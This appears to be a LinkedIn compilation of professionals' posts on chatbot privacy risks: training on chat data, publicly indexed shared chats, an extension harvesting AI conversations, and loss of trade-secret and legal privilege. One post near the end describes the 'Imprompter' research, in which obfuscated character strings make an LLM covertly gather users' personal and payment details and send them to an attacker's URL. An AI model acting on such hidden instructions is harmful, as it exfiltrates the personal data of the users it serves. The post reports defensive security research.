This Stanford study examined how six major AI companies (Anthropic, OpenAI, Google, Meta, Microsoft, and Amazon) handle user data from chatbot conversations. Here are the main privacy concerns. 👀 All six companies use chat data for training by default, though some allow opt-out 👀 Data retention is often indefinite, with personal information stored long-term 👀 Cross-platform data merging occurs at multi-product companies (Google, Meta, Microsoft, Amazon) 👀 Children's data is handled inconsistently, with most companies not adequately protecting minors 👀 Limited transparency in privacy policies, which are complex and hard to understand and often lack crucial details about actual practices Practical Takeaways for Acceptable Use Policy and Training for nonprofits in using generative AI: ✅ Assume anything you share will be used for training - sensitive information, uploaded files, health details, biometric data, etc. ✅ Opt out when possible - proactively disable data collection for training (Meta is the one where you cannot) ✅ Information cascades through ecosystems - your inputs can lead to inferences that affect ads, recommendations, and potentially insurance or other third parties ✅ Special concern for children's data - age verification and consent protections are inconsistent Some questions to consider in acceptable use policies and to incorporate in any training. ❓ What types of sensitive information might your nonprofit staff share with generative AI? ❓ Does your nonprofit currently specifically identify what is considered “sensitive information” (beyond PID) and should not be shared with GenerativeAI ? Is this incorporated into training? ❓ Are you working with children, people with health conditions, or others whose data could be particularly harmful if leaked or misused? ❓ What would be the consequences if sensitive information or strategic organizational data ended up being used to train AI models? How might this affect trust, compliance, or your mission? How is this communicated in training and policy? Across the board, the Stanford research points that developers’ privacy policies lack essential information about their practices. They recommend policymakers and developers address data privacy challenges posed by LLM-powered chatbots through comprehensive federal privacy regulation, affirmative opt-in for model training, and filtering personal information from chat inputs by default. “We need to promote innovation in privacy-preserving AI, so that user privacy isn’t an afterthought." How are you advocating for privacy-preserving AI? How are you educating your staff to navigate this challenge? https://lnkd.in/g3RmbEwD
Understanding Chatbot Data Leaks
Explore top LinkedIn content from expert professionals.
Summary
Understanding chatbot data leaks means recognizing how information shared with AI chatbots can be collected, stored, and potentially exposed, leading to privacy, legal, and reputational risks. Chatbot data leaks occur when sensitive or confidential user inputs are unintentionally made public or used without clear consent, often due to unclear privacy policies or misuse of sharing features.
- Review privacy settings: Always check and adjust your privacy options before using AI chatbots to prevent your conversations from being used for unintended purposes.
- Update workplace policies: Clearly define what data employees can share with chatbots and provide regular training to help them understand the risks of disclosing sensitive information.
- Audit tool usage: Regularly review which AI tools are being used in your organization and monitor how data is processed and shared to prevent accidental leaks.
-
-
What if I told you that the conversations you have with AI in chat (your prompts, responses, and potentially sensitive context) could be collected and sold for profit without clear user consent? Would you still type those questions? If you work anywhere near AI and care about your data, this should bother you. A recent report by Koi.ai revealed that a browser extension was collecting users’ AI conversations across 10 major AI platforms. With a dedicated “executor” scripts, designed specifically to intercept and capture #AI conversations. Concerns aggravate as below: ➡️ The data harvesting runs continuously in the background, whether the VPN is connected or not. Some major red flags worth noting: 1️⃣ The extension auto-updated to version 5.5.0, with AI harvesting enabled by default (to help you imagine scale of this impact, 8M users' conversations are exposed) 2️⃣ There is no option to disable this behavior, except uninstalling the extension entirely 3️⃣ The extension carries a “Featured” badge, implying platform review and quality standards (clearly a miss) 4️⃣ It is affiliated with a data broker company (biggest giveaway) 5️⃣ The privacy policy explicitly confirms the data flow (precise statements here: https://lnkd.in/gwXq8EKn), yet the Chrome Web Store listing states: “This developer declares that your data is not being sold to third parties, outside approved use cases” High time to #audit what you’ve installed, read the #privacy policies and understand where your #data flows Our convenience is coming at the cost of silent surveillance.
-
A recent issue has emerged where private ChatGPT conversations, once shared, have become publicly searchable on Google. This is a huge red flag for HR. Conversations containing sensitive information, like employee personal details from CVs, confidential business plans, or even legal advice, are now potentially exposed. My key takeaways: ▶️ Data Privacy Nightmare: This isn't just a technical glitch; it's a massive data privacy risk. Imagine employee PII, performance review details, or internal strategy documents showing up in a public search. This could lead to serious breaches and legal repercussions under regulations like GDPR or state privacy laws. ▶️ Policy and Training Gap: The root of the problem is a lack of awareness. Employees are using AI tools without fully understanding the privacy and security implications. This is a clear indicator that your AI policy needs to be robust and your training needs to be a top priority. Do your employees know what they should and shouldn't be putting into AI tools, or sharing from them? ▶️ Mitigation is Key: 🔸Audit Your Tools: Review which AI tools your employees are using and what data they might be processing. 🔸Revise Your Policy: Update your acceptable use policy to explicitly address the use of generative AI, including what types of information are strictly forbidden from being inputted or shared. 🔸Train Your People: Conduct urgent training sessions to raise awareness about the risks of sharing conversations from AI tools. This situation highlights the critical need for a proactive approach to AI governance in HR. It's no longer just about the tech; it's about the people using it and the sensitive data they handle. What's your biggest concern about employees using generative AI?
-
ChatGPT is not your friend. It’s a database. In July 2025, Google indexed over 4,500 ChatGPT conversations containing sensitive personal information. Because users clicked “Share,” and the system created public URLs. Google crawled, indexed and shared them. Here’s what surfaced: 🔸 Mental illness, addiction, and abuse 🔸 Names, locations, emails, resumes 🔸 Medical histories, legal strategies All searchable, linkable and public until OpenAI intervened: ✔️ The “Discoverable” sharing feature was disabled on July 31. ✔️ They are working with Google and other search engines to remove indexed chats. ✔️ OpenAI reminded users: deleting a chat from history does not delete the public link. Millions of people, including employees and customers are confiding in AI. They believe it’s private and safe. But it isn’t. It’s recording. Indexing. Storing. And when systems designed for experimentation are used for confession, the boundaries between personal risk and enterprise liability vanish. What are the implications for Boards? 1️⃣ Regulatory risk Under GDPR: 🔹 Data subjects have the right to erase, access, and informed consent. 🔹 Shared AI conversations with personal or sensitive data may violate these rights. 🔹 AI-generated prompts could fall under automated decision-making clauses. Under the EU AI Act: 🔹 Transparency, risk classification, and human oversight are mandatory. 🔹 This incident may be classified as a high-risk system failure in healthcare, HR, legal. 2️⃣ Legal risk There is currently no legal confidentiality in AI interactions. ✔️ Anything entered into AI could be subpoenaed, discoverable in court or leaked. ✔️ Companies are liable if employees share PII, IP, or client data via chatbots. ✔️ HR, Legal, and Compliance teams must assume AI logs are discoverable records. 3️⃣ Reputational risk People assumed they were talking to a trusted tool. Instead, they ended up on Google. For enterprises using AI for: ▫️ Coaching or mental health ▫️ HR assistance ▫️ Legal or compliance advisory ▫️ Customer service … this is a trust risk. Public exposure = brand damage. 4️⃣ Operational risk Many organisations lack: 📌 AI input/output governance 📌 Policies for AI use in confidential workflows 📌 Deletion/audit protocols for AI-linked data Takeaway If employees or customers treat ChatGPT like a coach, or colleague, ensure to treat it like a legal and technical system. That means: ✅ Create AI use and data handling policies ✅ Restrict use of genAI in regulated or sensitive domains ✅ Review GDPR/AI Act exposure for all shared AI features ✅ Treat all AI interactions as auditable records ✅ Demand transparency from vendors: what is stored, shared, indexed? Until regulators catch up and new legal protections exist, assume every AI interaction is public, permanent, and admissible. #AIgovernance #Boardroom #EUAIACT #DigitalTrust #Stratedge
-
Your trade secrets just walked out the front door … and you might have held it open. No employee—except the rare bad actor—means to leak sensitive company data. But it happens, especially when people are using generative AI tools like ChatGPT to “polish a proposal,” “summarize a contract,” or “write code faster.” But here’s the problem: unless you’re using ChatGPT Team or Enterprise, it doesn’t treat your data as confidential. According to OpenAI’s own Terms of Use: “We do not use Content that you provide to or receive from our API to develop or improve our Services.” But don‘t forget to read the fine print: that protection does not apply unless you’re on a business plan. For regular users, ChatGPT can use your prompts, including anything you type or upload, to train its large language models. Translation: That “confidential strategy doc” you asked ChatGPT to summarize? That “internal pricing sheet” you wanted to reword for a client? That “source code” you needed help debugging? ☠️ Poof. Trade secret status, gone. ☠️ If you don’t take reasonable measures to maintain the secrecy of your trade secrets, they will lose their protection as such. So how do you protect your business? 1. Write an AI Acceptable Use Policy. Be explicit: what’s allowed, what’s off limits, and what’s confidential. 2. Educate employees. Most folks don’t realize that ChatGPT isn’t a secure sandbox. Make sure they do. 3. Control tool access. Invest in an enterprise solution with confidentiality protections. 4. Audit and enforce. Treat ChatGPT the way you treat Dropbox or Google Drive, as tools that can leak data if unmanaged. 5. Update your confidentiality and trade secret agreements. Include restrictions on AI disclosures. AI isn’t going anywhere. The companies that get ahead of its risk will be the ones still standing when the dust settles. If you don’t have an AI policy and a plan to protect your data, you’re not just behind—you’re exposed.
-
I just watched a UX designer accidentally leak $12M worth of product strategy to ChatGPT in real-time. It happened during a design critique I was observing. He copy-pasted the entire product brief - codenames, launch dates, competitive analysis, user research with real participant quotes. All of it. Into a public AI system. No one in the room blinked an eye. I raised my hand an asked "That is in interesting approach - who else here does something similar?" More than half their hands raised. I cringe with what I knew I was about to reveal. "I really hate to tell you this - but that is sharing commercially sensitive information with public AI systems. De-identifying information isn't enough - because AI's super power is connecting seemingly disconnected information." The room went silent. Because we all realised: we've done this too. Here's the uncomfortable truth most of us don't discuss: As designers, we work a few months ahead of public releases. Our insights reveal strategic business direction. User research contains deeply personal information. Competitive intelligence is embedded in every design decision we make. We're trained to protect user privacy in our designs, yet we're surprisingly cavalier about privacy in our design process. What's at stake in 2025: - New EU AI regulations hold companies liable for data breaches. - Public AI tools are logging everything for training. Your client's biggest competitor might be using the same AI system. - The window to fix this quietly is closing. - This carousel shows you how to keep leveraging AI without becoming a walking NDA violation. - Because the future of design isn't just about AI literacy - it's about AI responsibility. The two-step abstraction method I share here preserves the strategic value whilst protecting confidentiality. It's about being professionals who can harness these tools without compromising the trust our clients place in us. 👇 🔥 TAG A Designer who needs to see this. 👇
-
AI browsers like ChatGPT Atlas are “always-on” co-pilots with the same access to session data, cookies, credentials, and content as the user. However, there are no enterprise controls or visibility around what the AI collects or sends back to the cloud model. They introduce massive blindspots and new data leakage vectors 😬😬: 1. Session memory leakage AI browsers capture session context such as active tab content, search history, and copy-pasted data to personalize results. Sensitive information can be embedded into prompts and sent to the vendor’s LLM API. 2. Shadow prompting Many AI browsers “auto-prompt” the model behind the scenes e.g., summarize this document, improve this draft, which can transmit page content and text selections outside enterprise visibility. 3. Training feedback Unless explicitly disabled, corporate session data can indirectly become training material for external AI systems 4. Identity and cookie exposure AI browsers use unified login sessions and shared cookies to fetch user-contextual answers – increasing the attack surface for session hijacking and identity replay, especially when AI sidebars interact with authenticated SaaS apps. 5. Unvetted agent ecosystems Some AI browsers allow third-party AI “agents” or extensions to automate web actions, such as scraping, posting, or extracting enterprise data with no audit trail or policy enforcement. More insights from our telemetry of millions of enterprise browser sessions → https://lnkd.in/dzm5FKkv
-
What happens to your AI chat data? If you’re using tools like ChatGPT or Gemini to generate ideas, write, summarize, or analyze, you're not alone. But if you're entering anything sensitive or strategic into those prompts, it’s time to pause, think, and ask a critical question: Who else can see this? I know I've wondered this before. A recent article in Fast Company uncovered something that’s flown under the radar for many professionals using generative AI tools in their workflow. Here are a few of the biggest takeaways: → AI models like ChatGPT use your chat data to train their models by default. Unless you actively disable this in your settings, OpenAI can store and use your conversations to improve its systems. Same with Gemini. I'm not sure about Claude and others. → Human reviewers may read your chats. That clever prompt you typed? It may be reviewed by a real person for quality control. This is especially important if you’re handling anything confidential, such as internal strategy docs, early-stage marketing plans, or even anonymized customer insights. → Shared chats have shown up in Google search. Fast Company found nearly 4,500 publicly shared ChatGPT chats indexed by Google, some containing sensitive personal or business data. OpenAI has since removed the feature that made these discoverable, but the lesson remains: treat AI chats like emails—they can be forwarded, indexed, or resurfaced. Just deleting your history doesn’t always mean it's gone. AI companies often retain chat logs for security or compliance. And Google Gemini currently doesn’t offer a “private mode” like ChatGPT’s temporary chat option. So, what can you do? Adjust your settings. In ChatGPT, go to Settings → Data Controls → Turn off “Improve the Model for Everyone.” Also, use “temporary chat” for sensitive queries. Be mindful of what you input. If it’s something you wouldn’t put in a Slack thread or email, maybe you shouldn't drop it into a chatbot. Avoid public sharing links unless you’re sure. Screenshots or copy/paste are safer if you need to circulate something. Let's keep in mind that AI is a powerful tool, but privacy is still your responsibility. I bring this up not to sound the alarmbut to encourage thoughtful use. Many of us are building content, strategy, and workflows around these tools. Let’s also build habits that reflect the trust and diligence we expect from our own clients and partners. Out of curiosity, have you updated your AI tool privacy settings recently? Did you know this was even an issue? Link to article in comments 👇
-
A Chatbot Prompt to Exfiltrate Data Security researchers from UCSD and Nanyang Technological University have developed an algorithm that can covertly command large language models (LLMs) to collect and transmit users' personal information, like names, payment details, and addresses, to hackers. This technique, dubbed “Imprompter,” disguises instructions within random characters that an LLM interprets as commands to extract data and send it to an external URL without alerting the user. Tested on LLMs like Mistral AI’s LeChat and ChatGLM, Imprompter demonstrated a high success rate, prompting Mistral AI to fix a related vulnerability. The attack highlights broader concerns around LLM security, as these models are increasingly integrated with functions that could be exploited. Experts caution companies and individuals alike to be mindful of the information shared with AI systems, especially as prompt injections—covert instructions hidden within seemingly harmless inputs—pose a growing risk in AI security.
-
You paid your lawyer $500 for a one-hour legal strategy session. Then you pasted it into ChatGPT to "understand it better." CONGRATS: opposing counsel can now subpoena that chat. This isn't hypothetical. In United States v. Heppner, a CEO pasted his lawyer's defense strategy into Claude AI. The FBI seized his devices and found all the chats. All 31 of them. And when he tried to claim privilege — the court shut it down. Reason: Attorney-client privilege only works when the conversation stays confidential. When you share it with a third party, that protection is gone. And AI platforms are third parties. ChatGPT, Claude, Gemini. These are companies with servers, data policies, terms of service. None of them owe you confidentiality. That's not a private conversation anymore. That's a record. And the other side can ask for it. I get it. AI feels private. Like a notes app. Like thinking out loud. But legally, it's not. And don't get me wrong. I'm not anti-AI. I run a law firm. We use it too. But instead of public AI, we use enterprise tools with safeguards that don't train on client data. If it's legal, strategic, or sensitive: DO NOT paste it into a chatbot. And if you're still in doubt, ask yourself: Would you hand this to opposing counsel? If the answer is no, don't hand it to ChatGPT either.